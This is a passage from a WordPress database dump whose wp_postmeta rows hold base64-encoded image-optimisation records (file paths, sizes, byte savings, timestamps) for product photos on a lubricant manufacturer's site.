aWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NDMsInRpbWUiOjE0ODM1NjM0MDAsImlkIjoxNzg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTI5LCJ0aW1lIjoxNDgzNTYzNDAzLCJpZCI6MTc4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjYxMywidGltZSI6MTQ4MzU2MzQwNywiaWQiOjE3ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoyMDI3LCJ0aW1lIjoxNDgzNTYzNDEwLCJpZCI6MTc4Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDI2LCJ0aW1lIjoxNDgzNTYzNDEzLCJpZCI6MTc4Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjU3LCJ0aW1lIjoxNDgzNTYzNDE3LCJpZCI6MTc4Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzIzLCJ0aW1lIjoxNDgzNTYzNDIxLCJpZCI6MTc4Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTA0NywidGltZSI6MTQ4MzU2MzQyNCwiaWQiOjE3ODZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozODIsInRpbWUiOjE0ODM1NjM0MjgsImlkIjoxNzg2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29184, 1785, 'wpfc_optimisation_reduction', '28868'); 
INSERT INTO `wp_postmeta` VALUES (29185, 1785, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2MzQzMiwiaWQiOiIxNzg1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEwMjQsInRpbWUiOjE0ODM1NjM0MzUsImlkIjoxNzg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzQ4OCwidGltZSI6MTQ4MzU2MzQzOSwiaWQiOjE3ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjozMDQzLCJ0aW1lIjoxNDgzNTYzNDQzLCJpZCI6MTc4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTQxMDQsInRpbWUiOjE0ODM1NjM0NDYsImlkIjoxNzg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6Njc1LCJ0aW1lIjoxNDgzNTYzNDUxLCJpZCI6MTc4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUzNiwidGltZSI6MTQ4MzU2MzQ1NCwiaWQiOjE3ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MzYsInRpbWUiOjE0ODM1NjM0NTcsImlkIjoxNzg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjE4OCwidGltZSI6MTQ4MzU2MzQ2MSwiaWQiOjE3ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQyNCwidGltZSI6MTQ4MzU2MzQ2NCwiaWQiOjE3ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU5NywidGltZSI6MTQ4MzU2MzQ2NywiaWQiOjE3ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjcyOSwidGltZSI6MTQ4MzU2MzQ3MSwiaWQiOjE3ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg1MDAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMzksInRpbWUiOjE0ODM1NjM0NzQsImlkIjoxNzg1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODUwMC05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy04NTAwLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6Mzg1LCJ0aW1lIjoxNDgzNTYzNDc3LCJpZCI6MTc4NX1d'); 
INSERT INTO `wp_postmeta` VALUES (29186, 1784, 'wpfc_optimisation_reduction', '25110'); 
INSERT INTO `wp_postmeta` VALUES (29187, 1784, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjM0ODIsImlkIjoiMTc4NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MTIsInRpbWUiOjE0ODM1NjM0ODUsImlkIjoxNzg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjg5OSwidGltZSI6MTQ4MzU2MzQ4OSwiaWQiOjE3ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNjA1LCJ0aW1lIjoxNDgzNTYzNDkzLCJpZCI6MTc4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0x